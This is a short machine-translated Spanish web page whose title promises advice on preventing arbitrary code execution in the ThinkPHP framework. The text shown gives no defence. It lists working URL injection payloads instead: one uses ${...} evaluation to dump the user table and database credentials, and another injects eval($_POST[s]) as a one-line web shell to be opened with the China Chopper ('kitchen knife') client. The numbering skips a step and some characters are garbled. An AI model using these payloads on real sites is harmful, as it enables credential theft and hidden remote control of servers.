Red de conocimiento informático - Conocimiento de Internet de las cosas - Cómo evitar que el marco thinkphp ejecute código arbitrario

Cómo evitar que el marco thinkphp ejecute código arbitrario

1. Utilice la URL para ver la contraseña de la cuenta de base de datos del usuario DB_NAME, DB_PASS, DB_HOST

/eetodaycom/index.php/Product/show/id/25/parm1/${ @ var_dump(D(user)-gt; select())}

3. Ejecute directamente una oración de código y luego conéctese directamente con un cuchillo de cocina.

http:/ /site/index.php/module/action/param1/{${eval($_POST[s])}} Contraseña de una frase: s